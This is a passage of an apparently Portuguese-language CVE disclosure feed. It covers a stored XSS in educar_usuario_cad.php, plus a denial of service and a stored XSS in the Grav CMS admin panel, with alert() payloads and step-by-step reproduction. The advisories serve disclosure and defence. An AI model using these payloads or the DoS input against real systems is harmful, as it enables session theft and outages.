&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;educar_usuario_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;matricula_interna&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-gdscript3&amp;#34; data-lang=&amp;#34;gdscript3&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;onload&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;16&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;passos-para-reproduzir&amp;#34;&amp;gt;Passos para reproduzir:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Faça login com uma conta que possa criar ou editar usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Navegue até Configurações → Permissões → Usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Crie um novo usuário ou edite um existente.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;No campo Matrícula Interna, insira o payload.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Salve as alterações.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9638/image.png&amp;#34;
	width=&amp;#34;1630&amp;#34;
	height=&amp;#34;851&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9638/image_hu_cc7ec697ae4e70f7.png 480w, /p/cve-2025-9638/image_hu_555dd8de909d4f60.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;191&amp;#34;
		data-flex-basis=&amp;#34;459px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Abra o registro do usuário afetado.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;O payload é executado imediatamente, confirmando o XSS armazenado.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9638/image-1.png&amp;#34;
	width=&amp;#34;1278&amp;#34;
	height=&amp;#34;689&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9638/image-1_hu_2f16889c8f63d68d.png 480w, /p/cve-2025-9638/image-1_hu_e3a35d5e25fb0aad.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;185&amp;#34;
		data-flex-basis=&amp;#34;445px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: Erosão da confiança entre usuários e administradores do site.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://fluidattacks.com/pt/advisories/travis&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://fluidattacks.com/pt/advisories/travis&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 09 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-66305</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-66305/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-66305/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-66305-negação-de-serviço-devido-ao-tratamento-inadequado-de-entrada-no-parâmetro-supported&amp;#34;&amp;gt;CVE-2025-66305: Negação de serviço devido ao tratamento inadequado de entrada no parâmetro &amp;lt;code&amp;gt;Supported&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66305&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66305&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Negação de Serviço (DoS) foi identificada no submenu &amp;lt;b&amp;gt;&amp;#34;Idiomas&amp;#34;&amp;lt;/b&amp;gt; do painel de &amp;lt;b&amp;gt;configuração administrativa&amp;lt;/b&amp;gt; do Grav (&amp;lt;code&amp;gt;/admin/config/system&amp;lt;/code&amp;gt;). Especificamente, o parâmetro &amp;lt;code&amp;gt;Supported&amp;lt;/code&amp;gt; não valida corretamente a entrada do usuário. Se um valor malformado for inserido — como uma única barra (&amp;lt;code&amp;gt;/&amp;lt;/code&amp;gt;) ou uma string de teste XSS — isso causa um erro fatal de análise de expressão regular no servidor.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-66305-negação-de-serviço-devido-ao-tratamento-inadequado-de-entrada-no-parâmetro-supported&amp;#34;&amp;gt;CVE-2025-66305: Negação de serviço devido ao tratamento inadequado de entrada no parâmetro &amp;lt;code&amp;gt;Supported&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66305&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66305&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Negação de Serviço (DoS) foi identificada no submenu &amp;lt;b&amp;gt;&amp;#34;Idiomas&amp;#34;&amp;lt;/b&amp;gt; do painel de &amp;lt;b&amp;gt;configuração administrativa&amp;lt;/b&amp;gt; do Grav (&amp;lt;code&amp;gt;/admin/config/system&amp;lt;/code&amp;gt;). Especificamente, o parâmetro &amp;lt;code&amp;gt;Supported&amp;lt;/code&amp;gt; não valida corretamente a entrada do usuário. Se um valor malformado for inserido — como uma única barra (&amp;lt;code&amp;gt;/&amp;lt;/code&amp;gt;) ou uma string de teste XSS — isso causa um erro fatal de análise de expressão regular no servidor.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo constrói dinamicamente uma expressão regular usando o conteúdo do campo &amp;lt;code&amp;gt;Supported&amp;lt;/code&amp;gt; sem escapar a entrada usando &amp;lt;code&amp;gt;preg_quote()&amp;lt;/code&amp;gt; ou validação adequada. Isso permite que atacantes injetem sintaxe inválida no mecanismo de expressões regulares, causando a falha do aplicativo durante a resolução de idioma.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;mensagem-de-erro&amp;#34;&amp;gt;Mensagem de erro:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;code&amp;gt;Whoops \ Exception \ ErrorException (E_WARNING) preg_match(): Modificador desconhecido &amp;#39;o&amp;#39; /system/src/Grav/Common/Language/Language.php244&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;POST /admin/config/system&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Submenu: &amp;lt;code&amp;gt;Languages&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Supported&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Faça login no Painel de Administração do Grav.&amp;lt;/br&amp;gt;
&amp;lt;li&amp;gt;Navegue até: &amp;lt;b&amp;gt;Configuração → Sistema → Idiomas&amp;lt;/b&amp;gt;.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Localize o campo &amp;lt;code&amp;gt;Suported&amp;lt;/code&amp;gt;.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Insira um payload (por exemplo, uma única barra &amp;lt;code&amp;gt;/&amp;lt;/code&amp;gt;).&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Clique em &amp;lt;b&amp;gt;Salvar&amp;lt;/b&amp;gt;.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66305/image.png&amp;#34;
	width=&amp;#34;1897&amp;#34;
	height=&amp;#34;639&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66305/image_hu_c3420762a046330d.png 480w, /p/cve-2025-66305/image_hu_3d12dcd60c603267.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;296&amp;#34;
		data-flex-basis=&amp;#34;712px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Observe: Todas as páginas do aplicativo começam a exibir um erro fatal e ficam inacessíveis.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66305/image-1.png&amp;#34;
	width=&amp;#34;1802&amp;#34;
	height=&amp;#34;998&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66305/image-1_hu_3cf5c52544b0b6fa.png 480w, /p/cve-2025-66305/image-1_hu_379d1b4d6d7e7b50.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;180&amp;#34;
		data-flex-basis=&amp;#34;433px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Ataque de Negação de Serviço (DoS) em toda a aplicação.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Todas as telas de login e administração travam com o mesmo erro.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Potencialmente explorável por: Usuários do painel de administração; CSRF se configurado incorretamente.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/getgrav/grav/security/advisories/GHSA-m8vh-v6r6-w7p6&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/getgrav/grav/security/advisories/GHSA-m8vh-v6r6-w7p6&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 01 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-66308</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-66308/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-66308/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-66308-cross-site-scripting-xss-armazenado-no-parêmetro-datataxonomies-do-endpoint-adminconfigsite&amp;#34;&amp;gt;CVE-2025-66308: Cross-Site Scripting (XSS) Armazenado no Parêmetro &amp;lt;code&amp;gt;data[taxonomies]&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/admin/config/site&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66308&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66308&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint &amp;lt;code&amp;gt;/admin/config/site&amp;lt;/code&amp;gt; do aplicativo &amp;lt;i&amp;gt;Grav&amp;lt;/i&amp;gt;. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;data[taxonomies]&amp;lt;/code&amp;gt;. O payload injetado é armazenado no servidor e executado automaticamente no navegador de qualquer usuário que acesse a configuração do site afetado, resultando em um vetor de ataque persistente.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-66308-cross-site-scripting-xss-armazenado-no-parêmetro-datataxonomies-do-endpoint-adminconfigsite&amp;#34;&amp;gt;CVE-2025-66308: Cross-Site Scripting (XSS) Armazenado no Parêmetro &amp;lt;code&amp;gt;data[taxonomies]&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/admin/config/site&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66308&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66308&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint &amp;lt;code&amp;gt;/admin/config/site&amp;lt;/code&amp;gt; do aplicativo &amp;lt;i&amp;gt;Grav&amp;lt;/i&amp;gt;. Essa vulnerabilidade permite que atacantes injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;data[taxonomies]&amp;lt;/code&amp;gt;. O payload injetado é armazenado no servidor e executado automaticamente no navegador de qualquer usuário que acesse a configuração do site afetado, resultando em um vetor de ataque persistente.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint vulnerável: &amp;lt;code&amp;gt;POST /admin/config/site&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;data[taxonomies]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não valida ou higieniza corretamente a entrada no campo &amp;lt;code&amp;gt;data[taxonomies]&amp;lt;/code&amp;gt;. Como resultado, um atacante pode injetar código JavaScript, que é armazenado na configuração do site e posteriormente renderizado na interface administrativa ou na saída do site, causando execução automática no navegador do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;amp;#39;XSS-PoC&amp;amp;#39;)&amp;amp;lt;/script&amp;amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;passos-para-reproduzir&amp;#34;&amp;gt;Passos para reproduzir:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Faça login no Painel de Administração do &amp;lt;i&amp;gt;Grav&amp;lt;/i&amp;gt; com permissões suficientes para modificar a configuração do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Navegue até &amp;lt;b&amp;gt;Configuração &amp;gt; Site&amp;lt;/b&amp;gt;.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;No campo &amp;lt;b&amp;gt;Tipos de Taxonomias&amp;lt;/b&amp;gt; (que corresponde a &amp;lt;code&amp;gt;data[taxonomies]&amp;lt;/code&amp;gt;), insira o payload.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Salve a configuração.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66308/image.png&amp;#34;
	width=&amp;#34;1897&amp;#34;
	height=&amp;#34;628&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66308/image_hu_2db52fe672979960.png 480w, /p/cve-2025-66308/image_hu_3b02d8d0dfaa4c28.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;302&amp;#34;
		data-flex-basis=&amp;#34;724px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesse as Páginas e clique em uma delas.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66308/image-1.png&amp;#34;
	width=&amp;#34;932&amp;#34;
	height=&amp;#34;587&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66308/image-1_hu_31314f0d34cb0fe9.png 480w, /p/cve-2025-66308/image-1_hu_b304d93e6237dbae.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;158&amp;#34;
		data-flex-basis=&amp;#34;381px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;O payload armazenado é executado imediatamente no navegador, confirmando a vulnerabilidade XSS armazenada.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66308/image-2.png&amp;#34;
	width=&amp;#34;1204&amp;#34;
	height=&amp;#34;377&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66308/image-2_hu_44fbaf72eed9e907.png 480w, /p/cve-2025-66308/image-2_hu_3e2f9566dc2c6480.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;319&amp;#34;
		data-flex-basis=&amp;#34;766px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;A requisição HTTP enviada durante este processo contém o parâmetro e o payload vulneráveis:&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66308/image-3.png&amp;#34;
	width=&amp;#34;757&amp;#34;
	height=&amp;#34;675&amp;#34;
